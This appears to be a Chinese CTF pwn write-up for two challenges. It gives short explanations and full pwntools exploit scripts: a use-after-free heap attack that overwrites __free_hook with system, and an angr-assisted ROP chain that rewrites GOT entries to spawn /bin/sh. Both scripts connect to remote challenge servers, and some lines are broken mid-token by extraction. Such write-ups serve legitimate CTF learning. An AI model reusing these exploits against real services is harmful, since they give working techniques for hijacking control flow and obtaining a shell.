Pwn
CPP
解题思路
题⽬存在uaf,结合堆⻛⽔getshell
#!/usr/bin/python
#coding:utf-8
from pwn import *
context.log_level='debug'
#io=process("./chall",env={"LD_PRELOAD":"./libc-2.31.so"})
io=remote('124.70.12.210', 10002)
libc=ELF("./libc-2.31.so")
sla=lambda a : io.sendlineafter(">",str(a))
ia =lambda : io.interactive()
def add(idx):
sla(0)#choice
sla("/bin/sh")
sla(i)#index
def dele(idx,ct='a'):
sla(1)#choice
sla(idx)
sla(ct)#index
#gdb.attach(io,'b *{}+0x0000555555554000'.format(0x13dd))
for i in range(0x420/0x20+2):
add(i)
add(2)
sla(1)#choice
sla(1)
heap_base=u64(io.recvuntil("\x0a")[-7:-1].ljust(8,'\x00'))-0x470+0x20
log.success("heap_base==>"+hex(heap_base))
sla('a')
fake_heap=heap_base+8
fake_heap=p32((fake_heap)&0xffffffff)+p8((fake_heap>>32)&0xff)+p8((fake_he
ap>>40)&0xff)
dele(2,'a')
dele(3,fake_heap)
sla(0)
sla("aaaa")
sla(1)
sla(0)
sla(p16(0x421))
sla(2)
sla(1)#choice
sla(0)
libc_base=u64(io.recvuntil("\x7f")[-6:].ljust(8,'\x00'))-0x1ebbe0
log.success("libc_base==>"+hex(libc_base))
sla('a')
malloc_hook=libc_base+libc.sym["__malloc_hook"]
free_hook=libc_base+libc.sym["__free_hook"]
malloc_hook=p32((malloc_hook)&0xffffffff)+p8((malloc_hook>>32)&0xff)+p8((m
alloc_hook>>40)&0xff)
free_hook=p32((free_hook)&0xffffffff)+p8((free_hook>>32)&0xff)+p8((free_ho
ok>>40)&0xff)
dele(5)
dele(6)
dele(7)
dele(8,free_hook)
sla(0)
sla(p16(0x421))
sla(5)
sla(0)
#gdb.attach(io)
system=0x55470+libc_base
libc_print=(0x271b0+libc_base)
#gdb.attach(io,'b *{}'.format(system))
sla(p64(system-0x60))
sla(255)
ia()
#0x5555555582e0
game
解题思路
前⾯是AEG,利⽤ang⾃动化r解出后,可以栈溢出,利⽤rop部分覆写got表为syscall即可利
⽤read读取相应字节的字符设置rax,ret2syscall
from pwn import *
import base64,time,os
import angr
import claripy
p = remote("121.36.21.113", 10004)
x=time.time()
context.log_level = 'debug'
def rop():
f = open("./1", 'rb+')
binary = f.read()
pop_rdi = 0x400000+binary.find("\x5F\xC3")
pop_rsi = pop_rdi-2
read_plt = 0x400560
alarm_got = 0x601018
atoi_got = 0x601038
alarm_plt = 0x400550
init = pop_rdi-9
init2 = pop_rdi-0x23
def call_(rbx,rbp,r12,r13,r14,r15):
return p64(init)+p64(rbx)+p64(rbp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)+p64(init2)
num = binary.find("\x75\x29\x48\x8d\x85")
num = 0x10000-u16(binary[num+5]+binary[num+6])
log.info(hex(num))
payload = 'a'*
(num+8)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(alarm_got)+p64(0)+p64(read_pl
t)+p64(pop_rsi)+p64(0x601500)+p64(0)+p64(read_plt)
payload += call_(0,1,alarm_got,0,0,0x601500)
#gdb.attach(p, 'b*0x40081c')
p.send(payload)
time.sleep(1)
p.send("\x85")
time.sleep(1)
p.send("/bin/sh".ljust(59, '\x00'))
p.sendline("cat flag")
p.interactive()
def main():
p.recvuntil("------------------data info------------------\n")
data = p.recvuntil('\n', drop = True)
os.system("rm 1")
f = open("./1", 'wb+')
f.write(base64.b64decode(data))
f.close()
os.system("chmod 777 ./1")
project = angr.Project("./1")
argv1 = claripy.BVS("argv1",10*8)
st = project.factory.entry_state(args=["./1",argv1])
for byt in argv1.chop(8):
st.add_constraints(st.solver.And(byt >= ord('0'),byt <= ord('9')))
sm = project.factory.simulation_manager(st)
sm.one_active.options.add(angr.options.LAZY_SOLVES)
sm.explore(find=0x400560)
result = sm.found[0].solver.eval(argv1, cast_to=bytes)
print(result)
y=time.time()
print("----------------------%f------------------------------"%(y-x))
p.sendlineafter("input code:", result)
rop()
if __name__ == '__main__':
main()